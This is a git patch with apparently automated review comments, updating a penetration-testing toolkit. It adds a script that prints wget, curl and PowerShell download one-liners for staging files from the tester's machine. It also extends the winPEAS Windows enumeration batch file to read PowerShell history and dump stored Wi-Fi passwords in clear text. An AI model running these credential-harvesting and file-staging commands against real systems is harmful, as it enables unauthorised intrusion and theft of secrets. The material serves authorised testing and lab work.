From eb9e62b70f664794491ae4fa285c21cf98035177 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Thu, 1 Oct 2020 22:39:39 +0200
Subject: [PATCH] winPEAS update
---
 startHttpServer.sh | 9 +++++++++
 win/winPEAS.bat | 7 ++++---
 2 files changed, 13 insertions(+), 3 deletions(-)
 create mode 100755 startHttpServer.sh
diff --git a/startHttpServer.sh b/startHttpServer.sh
new file mode 100755
index 0000000..21aed28
--- /dev/null
+++ b/startHttpServer.sh
@@ -0,0 +1,9 @@
+#!/usr/bin/bash
+
+ipAddress=$(ip a show dev tun0 | grep inet | awk '{print $2'} | cut -d'/' -f1 | head -n 1)
+echo "wget http://${ipAddress}/"
+echo "curl http://${ipAddress}/"
+echo "(New-Object System.Net.WebClient).DownloadFile('http://${ipAddress}/', 'C:\\Temp\\')"
+
+echo ""
+sudo python -m http.server 80
diff --git a/win/winPEAS.bat b/win/winPEAS.bat
index e1f39a1..86b2086 100644
--- a/win/winPEAS.bat
+++ b/win/winPEAS.bat
@@ -165,6 +165,8 @@ echo.
 echo PS default transcript history
 dir %SystemDrive%\transcripts\
 echo.
+echo Checking PS history file
+dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
 echo.
 echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] MOUNTED DISKS ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
 echo [i] Maybe you find something interesting
@@ -278,8 +280,7 @@ ipconfig /displaydns | findstr "Record" | findstr "Name Host"
 echo.
 echo.
 echo _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-^> [+] WIFI ^<_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
-echo [i] To get the clear-text password use: netsh wlan show profile key=clear
-netsh wlan show profile
+for /f "tokens=4 delims=: " %%a in ('netsh wlan show profiles ^| find "Profile "') do (netsh wlan show profiles name=%%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.)
 echo.
 echo.
 echo.
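Review bot: `ipAddress` is never checked, so when tun0 is down or absent the pipeline yields an empty string, the three echo lines print `http:///`, and the server is still started, serving the current working directory on every interface rather than only on the tunnel. Fail early on an empty address and pass it to `--bind` so the listener is not reachable from other networks. The awk program `'{print $2'}` only works because the stray `}` is concatenated onto the quoted string; `'{print $2}'` is what was meant, and `ip -4` keeps `grep inet` from also matching `inet6` lines. `python` resolves to Python 2 on many hosts, where `-m http.server` does not exist, so `python3` is the portable name, and `#!/usr/bin/env bash` is safer than the hard-coded `#!/usr/bin/bash`.
```shell
#!/usr/bin/env bash

ipAddress=$(ip -4 a show dev tun0 | grep inet | awk '{print $2}' | cut -d'/' -f1 | head -n 1)
[[ -n "$ipAddress" ]] || { printf 'tun0 has no IPv4 address\n' >&2; exit 1; }
# … unchanged: the three echo lines and the blank line …
sudo python3 -m http.server --bind "$ipAddress" 80
```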
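Review bot: The new `echo Checking PS history file` drops the `[i]` prefix that the neighbouring informational lines use (`echo [i] Maybe you find something interesting` two lines below), and `dir` on a path that does not exist prints `File Not Found` on stderr in the middle of the report. Keeping the prefix and handling the missing-file case explicitly makes the output uniform: `echo [i] Checking PS history file` followed by `dir "%APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" 2>nul || echo [i] No PSReadLine history file for this user`.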
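Review bot: `tokens=4 delims=: ` keeps only the first word of each profile name, so for any profile whose name contains a space the inner `netsh wlan show profiles name=%%a` is called with a truncated name and netsh prints an error instead of that profile's details. The usual batch idiom is to take the remainder after the colon with `tokens=1* delims=:` and trim the leading blanks with a nested `for /f "tokens=*" %%c in ("%%b")`, then pass `name="%%c"` quoted. The commit also removes the only line that explained what this section prints; the other sections keep an `echo [i] ...` header, so one should be restored here, e.g. `echo [i] Stored WLAN profiles (key material is shown where readable)`.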
@@ -359,7 +360,7 @@ echo [i] The permissions are also checked and filtered using icacls
 echo [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
 for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
 for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
- echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
+ echo %%~s ^| findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
 )
 )
 ::wmic service get name,displayname,pathname,startmode | more | findstr /i /v "C:\\Windows\\system32\\" | findstr /i /v """
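Review bot: Escaping the pipe as `^|` inside the `do ( ... )` block makes it a literal character instead of an operator, as far as I can tell: the block is parsed once, carets are consumed at that point, and the FOR variable is substituted afterwards without re-parsing, so the added line becomes a single `echo` whose output goes to `nul`, which always succeeds and lets the `&&` branch run for every service rather than only for the paths that contain a space. The `^|` form is only required inside the `in ('...')` command strings, where the two `for /f` lines above already use it, so the previous `echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (...)` should be restored. If the caret was added to work around a specific path that broke parsing, that case deserves a `::` comment above the line rather than a silent change of what the filter does. Both enclosing `for` loops open and close within this hunk.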